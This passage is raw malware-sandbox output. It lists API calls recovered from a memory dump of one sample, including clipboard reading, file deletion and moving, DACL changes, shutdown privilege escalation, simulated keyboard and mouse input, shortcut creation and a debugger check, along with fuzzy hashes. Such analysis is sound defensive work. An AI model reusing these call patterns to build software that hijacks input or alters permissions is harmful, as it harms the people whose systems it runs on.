                                                                                                                                                                                                                                                                  • Part of subcall function 006D10F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,006D0B9B,?,?,?), ref: 006D1120
                                                                                                                                                                                                                                                                  • Part of subcall function 006D10F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,006D0B9B,?,?,?), ref: 006D112F
                                                                                                                                                                                                                                                                  • Part of subcall function 006D10F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,006D0B9B,?,?,?), ref: 006D1136
                                                                                                                                                                                                                                                                  • Part of subcall function 006D10F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 006D114D
                                                                                                                                                                                                                                                                • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 006D0BCC
                                                                                                                                                                                                                                                                • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 006D0C00
                                                                                                                                                                                                                                                                • GetLengthSid.ADVAPI32(?), ref: 006D0C17
                                                                                                                                                                                                                                                                • GetAce.ADVAPI32(?,00000000,?), ref: 006D0C51
                                                                                                                                                                                                                                                                • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 006D0C6D
                                                                                                                                                                                                                                                                • GetLengthSid.ADVAPI32(?), ref: 006D0C84
                                                                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,00000008), ref: 006D0C8C
                                                                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000), ref: 006D0C93
                                                                                                                                                                                                                                                                • GetLengthSid.ADVAPI32(?,00000008,?), ref: 006D0CB4
                                                                                                                                                                                                                                                                • CopySid.ADVAPI32(00000000), ref: 006D0CBB
                                                                                                                                                                                                                                                                • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 006D0CEA
                                                                                                                                                                                                                                                                • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 006D0D0C
                                                                                                                                                                                                                                                                • SetUserObjectSecurity.USER32(?,00000004,?), ref: 006D0D1E
                                                                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 006D0D45
                                                                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 006D0D4C
                                                                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 006D0D55
                                                                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 006D0D5C
                                                                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 006D0D65
                                                                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 006D0D6C
                                                                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?), ref: 006D0D78
                                                                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 006D0D7F
                                                                                                                                                                                                                                                                  • Part of subcall function 006D1193: GetProcessHeap.KERNEL32(00000008,006D0BB1,?,00000000,?,006D0BB1,?), ref: 006D11A1
                                                                                                                                                                                                                                                                  • Part of subcall function 006D1193: HeapAlloc.KERNEL32(00000000,?,00000000,?,006D0BB1,?), ref: 006D11A8
                                                                                                                                                                                                                                                                  • Part of subcall function 006D1193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,006D0BB1,?), ref: 006D11B7
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2694679873.0000000000671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694624521.0000000000670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.000000000070C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.0000000000732000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695084785.000000000073C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695157017.0000000000744000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_670000_2ada66c192.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 4175595110-0
                                                                                                                                                                                                                                                                • Opcode ID: 0ab7fe832cd93dc548d1867e6f9bcd8c81369f66bab68225ad1f93d996106a21
                                                                                                                                                                                                                                                                • Instruction ID: b2ecc0855f7fea8e89ec2fb1f42fa57b029de25a30640d8e6bb27295bff30d4f
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0ab7fe832cd93dc548d1867e6f9bcd8c81369f66bab68225ad1f93d996106a21
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E9715C71D0020AEFEF11DFA4DC45BEEBBBABF09300F148616E914A7291DB75A905CB60
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • OpenClipboard.USER32(0070CC08), ref: 006EEB29
                                                                                                                                                                                                                                                                • IsClipboardFormatAvailable.USER32(0000000D), ref: 006EEB37
                                                                                                                                                                                                                                                                • GetClipboardData.USER32(0000000D), ref: 006EEB43
                                                                                                                                                                                                                                                                • CloseClipboard.USER32 ref: 006EEB4F
                                                                                                                                                                                                                                                                • GlobalLock.KERNEL32(00000000), ref: 006EEB87
                                                                                                                                                                                                                                                                • CloseClipboard.USER32 ref: 006EEB91
                                                                                                                                                                                                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 006EEBBC
                                                                                                                                                                                                                                                                • IsClipboardFormatAvailable.USER32(00000001), ref: 006EEBC9
                                                                                                                                                                                                                                                                • GetClipboardData.USER32(00000001), ref: 006EEBD1
                                                                                                                                                                                                                                                                • GlobalLock.KERNEL32(00000000), ref: 006EEBE2
                                                                                                                                                                                                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 006EEC22
                                                                                                                                                                                                                                                                • IsClipboardFormatAvailable.USER32(0000000F), ref: 006EEC38
                                                                                                                                                                                                                                                                • GetClipboardData.USER32(0000000F), ref: 006EEC44
                                                                                                                                                                                                                                                                • GlobalLock.KERNEL32(00000000), ref: 006EEC55
                                                                                                                                                                                                                                                                • DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 006EEC77
                                                                                                                                                                                                                                                                • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 006EEC94
                                                                                                                                                                                                                                                                • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 006EECD2
                                                                                                                                                                                                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 006EECF3
                                                                                                                                                                                                                                                                • CountClipboardFormats.USER32 ref: 006EED14
                                                                                                                                                                                                                                                                • CloseClipboard.USER32 ref: 006EED59
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2694679873.0000000000671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694624521.0000000000670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.000000000070C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.0000000000732000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695084785.000000000073C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695157017.0000000000744000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_670000_2ada66c192.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Clipboard$Global$AvailableCloseDataDragFileFormatLockQueryUnlock$CountFormatsOpen
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 420908878-0
                                                                                                                                                                                                                                                                • Opcode ID: 4e828392334873367c1d4b9e7861196ed1fdf1b1f286311f64158f8605f97f30
                                                                                                                                                                                                                                                                • Instruction ID: 6cc427d6ed7f16289f307b35c373bef45b39d6bb25d64db547404e24c9b901ee
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4e828392334873367c1d4b9e7861196ed1fdf1b1f286311f64158f8605f97f30
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7B61DD34204341DFD311EF21D889F6A77A6AF84714F14861DF45A872A2DF36DD0ACBA6
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • FindFirstFileW.KERNEL32(?,?), ref: 006E69BE
                                                                                                                                                                                                                                                                • FindClose.KERNEL32(00000000), ref: 006E6A12
                                                                                                                                                                                                                                                                • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 006E6A4E
                                                                                                                                                                                                                                                                • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 006E6A75
                                                                                                                                                                                                                                                                  • Part of subcall function 00679CB3: _wcslen.LIBCMT ref: 00679CBD
                                                                                                                                                                                                                                                                • FileTimeToSystemTime.KERNEL32(?,?), ref: 006E6AB2
                                                                                                                                                                                                                                                                • FileTimeToSystemTime.KERNEL32(?,?), ref: 006E6ADF
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2694679873.0000000000671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694624521.0000000000670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.000000000070C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.0000000000732000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695084785.000000000073C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695157017.0000000000744000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_670000_2ada66c192.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Time$File$FindLocalSystem$CloseFirst_wcslen
                                                                                                                                                                                                                                                                • String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
                                                                                                                                                                                                                                                                • API String ID: 3830820486-3289030164
                                                                                                                                                                                                                                                                • Opcode ID: 8f9b26bcd62b35cc50b2f753640a11bd6c1a68c205341568af2d50e305eb9401
                                                                                                                                                                                                                                                                • Instruction ID: f3a18b76fe98396fd46addc9ce5f8f3f5dd8fcc953bcd0aef9af82756e295b80
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8f9b26bcd62b35cc50b2f753640a11bd6c1a68c205341568af2d50e305eb9401
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 50D150B1508340AFC754EBA5C882EABB7EDAF98704F04891DF589C7191EB74DA44CB62
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 00673AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00673A97,?,?,00672E7F,?,?,?,00000000), ref: 00673AC2
                                                                                                                                                                                                                                                                  • Part of subcall function 006DE199: GetFileAttributesW.KERNEL32(?,006DCF95), ref: 006DE19A
                                                                                                                                                                                                                                                                • FindFirstFileW.KERNEL32(?,?), ref: 006DD122
                                                                                                                                                                                                                                                                • DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 006DD1DD
                                                                                                                                                                                                                                                                • MoveFileW.KERNEL32(?,?), ref: 006DD1F0
                                                                                                                                                                                                                                                                • DeleteFileW.KERNEL32(?,?,?,?), ref: 006DD20D
                                                                                                                                                                                                                                                                • FindNextFileW.KERNEL32(00000000,00000010), ref: 006DD237
                                                                                                                                                                                                                                                                  • Part of subcall function 006DD29C: CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,006DD21C,?,?), ref: 006DD2B2
                                                                                                                                                                                                                                                                • FindClose.KERNEL32(00000000,?,?,?), ref: 006DD253
                                                                                                                                                                                                                                                                • FindClose.KERNEL32(00000000), ref: 006DD264
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2694679873.0000000000671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694624521.0000000000670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.000000000070C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.0000000000732000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695084785.000000000073C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695157017.0000000000744000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_670000_2ada66c192.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
                                                                                                                                                                                                                                                                • String ID: \*.*
                                                                                                                                                                                                                                                                • API String ID: 1946585618-1173974218
                                                                                                                                                                                                                                                                • Opcode ID: f9c0c9ef69c26b358b3b499f315c6c0ba9107b1bb9b30405532d2207fc1984ba
                                                                                                                                                                                                                                                                • Instruction ID: e9f529fbbcb7fb5352d1757a68ebdcf21c579e83b4af8d7e12c1cfe4c1b65562
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f9c0c9ef69c26b358b3b499f315c6c0ba9107b1bb9b30405532d2207fc1984ba
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 12616B31C0110DAACF45FBE0CD929EDB7B6AF55300F20816AE50677292EB316F09DB65
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2694679873.0000000000671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694624521.0000000000670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.000000000070C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.0000000000732000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695084785.000000000073C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695157017.0000000000744000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_670000_2ada66c192.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1737998785-0
                                                                                                                                                                                                                                                                • Opcode ID: 136a5ebdae6fa69646af7d0fa64bc2c21e102aae9d458688fda8cd0cd11fdfba
                                                                                                                                                                                                                                                                • Instruction ID: cddb172760195b49120c1a2467fe503b62a1a082c5ed0a8eb6b3cb8507732c5e
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 136a5ebdae6fa69646af7d0fa64bc2c21e102aae9d458688fda8cd0cd11fdfba
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1C41AE35605651DFD321DF16D888B59BBE2AF44328F14C19DE4198B762CB3AEC42CB94
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 006D16C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 006D170D
                                                                                                                                                                                                                                                                  • Part of subcall function 006D16C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 006D173A
                                                                                                                                                                                                                                                                  • Part of subcall function 006D16C3: GetLastError.KERNEL32 ref: 006D174A
                                                                                                                                                                                                                                                                • ExitWindowsEx.USER32(?,00000000), ref: 006DE932
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2694679873.0000000000671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694624521.0000000000670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.000000000070C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.0000000000732000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695084785.000000000073C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695157017.0000000000744000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_670000_2ada66c192.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                                                                                                                                                                                                                • String ID: $ $@$SeShutdownPrivilege
                                                                                                                                                                                                                                                                • API String ID: 2234035333-3163812486
                                                                                                                                                                                                                                                                • Opcode ID: 1aca90c1b1e47b4b57c182915b0e0c4f023caee6c1eebb8a295e37c8b27c2b79
                                                                                                                                                                                                                                                                • Instruction ID: 5562bd69912778cf7366de2ab0df999eddd90f450109cb4fb003810c2ef300f6
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1aca90c1b1e47b4b57c182915b0e0c4f023caee6c1eebb8a295e37c8b27c2b79
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C4012672E11211BBEB6433B49C96BFF725EA714751F144A27F802EE3D2D9A65C4081D8
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 006E64DC
                                                                                                                                                                                                                                                                • CoInitialize.OLE32(00000000), ref: 006E6639
                                                                                                                                                                                                                                                                • CoCreateInstance.OLE32(0070FCF8,00000000,00000001,0070FB68,?), ref: 006E6650
                                                                                                                                                                                                                                                                • CoUninitialize.OLE32 ref: 006E68D4
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2694679873.0000000000671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694624521.0000000000670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.000000000070C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.0000000000732000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695084785.000000000073C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695157017.0000000000744000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_670000_2ada66c192.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                                                                                                                                                                                                                                • String ID: .lnk
                                                                                                                                                                                                                                                                • API String ID: 886957087-24824748
                                                                                                                                                                                                                                                                • Opcode ID: bf9d3e1638532914707d9943ff5b3d7627e2f1bfa0d8e145be9c8fb0bb994f97
                                                                                                                                                                                                                                                                • Instruction ID: fed576bfd9cbd975b43de1f6c6e79af97ef63fea6e5ff102e723cee70b5b728a
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: bf9d3e1638532914707d9943ff5b3d7627e2f1bfa0d8e145be9c8fb0bb994f97
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B4D14A71608341AFC354DF24C881D6BB7EAFF94344F00896DF5998B2A1EB70E905CBA6
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetForegroundWindow.USER32(?,?,00000000), ref: 006F22E8
                                                                                                                                                                                                                                                                  • Part of subcall function 006EE4EC: GetWindowRect.USER32(?,?), ref: 006EE504
                                                                                                                                                                                                                                                                • GetDesktopWindow.USER32 ref: 006F2312
                                                                                                                                                                                                                                                                • GetWindowRect.USER32(00000000), ref: 006F2319
                                                                                                                                                                                                                                                                • mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 006F2355
                                                                                                                                                                                                                                                                • GetCursorPos.USER32(?), ref: 006F2381
                                                                                                                                                                                                                                                                • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 006F23DF
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2694679873.0000000000671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694624521.0000000000670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.000000000070C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.0000000000732000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695084785.000000000073C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695157017.0000000000744000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_670000_2ada66c192.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Window$Rectmouse_event$CursorDesktopForeground
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2387181109-0
                                                                                                                                                                                                                                                                • Opcode ID: 0cc57a22fd8f21895618049e74d37942d6e4808d21f4edc464790fe62ab78141
                                                                                                                                                                                                                                                                • Instruction ID: 8deb49fdbc37799ae53a44d2f186a2d12077973a595391fe23ecf8aa4e25621f
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0cc57a22fd8f21895618049e74d37942d6e4808d21f4edc464790fe62ab78141
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F431D2B250531A9FC721DF14C845FABBBAAFF84314F000A1DF5859B291DB75E908CB95
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetKeyboardState.USER32(?,00000001,00000040,00000000), ref: 006DAAAC
                                                                                                                                                                                                                                                                • SetKeyboardState.USER32(00000080), ref: 006DAAC8
                                                                                                                                                                                                                                                                • PostMessageW.USER32(?,00000102,00000001,00000001), ref: 006DAB36
                                                                                                                                                                                                                                                                • SendInput.USER32(00000001,?,0000001C,00000001,00000040,00000000), ref: 006DAB88
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2694679873.0000000000671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694624521.0000000000670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.000000000070C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.0000000000732000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695084785.000000000073C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695157017.0000000000744000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_670000_2ada66c192.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: KeyboardState$InputMessagePostSend
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 432972143-0
                                                                                                                                                                                                                                                                • Opcode ID: 1995eeea4ad40a99f5ae8413a17eb99e02871c66991037560c604fade7f72cf0
                                                                                                                                                                                                                                                                • Instruction ID: 58486ae467673966998d6f03328183cc9acf913d69c57ab4bef0b7e504b2ece3
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1995eeea4ad40a99f5ae8413a17eb99e02871c66991037560c604fade7f72cf0
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0731E730E48248AFFB358BA5CC05BFA7BA7AB45310F14431BF581963D1D7758982C766
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • IsDebuggerPresent.KERNEL32 ref: 006A271A
                                                                                                                                                                                                                                                                • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 006A2724
                                                                                                                                                                                                                                                                • UnhandledExceptionFilter.KERNEL32(?), ref: 006A2731
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2694679873.0000000000671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694624521.0000000000670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.000000000070C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.0000000000732000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695084785.000000000073C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695157017.0000000000744000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_670000_2ada66c192.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3906539128-0
                                                                                                                                                                                                                                                                • Opcode ID: d3348355d6e18502bbb5dd6322ce06f5e816aa6eafaa56b3b965b821f23820f8
                                                                                                                                                                                                                                                                • Instruction ID: d2b009685461924580e4b70c4c33b10c02de2a464d0e23a43245530dbcb9a5a6
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d3348355d6e18502bbb5dd6322ce06f5e816aa6eafaa56b3b965b821f23820f8
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7F31D774951219ABCB61DF68DC887DCBBB9AF08310F5042DAE80CA7261E7349F818F49
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • FindFirstFileW.KERNEL32(?,?), ref: 006E6918
                                                                                                                                                                                                                                                                • FindClose.KERNEL32(00000000), ref: 006E6961
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2694679873.0000000000671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694624521.0000000000670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.000000000070C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.0000000000732000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695084785.000000000073C000.00000004.00000001.01000000.0000000B.sdmpDownload File
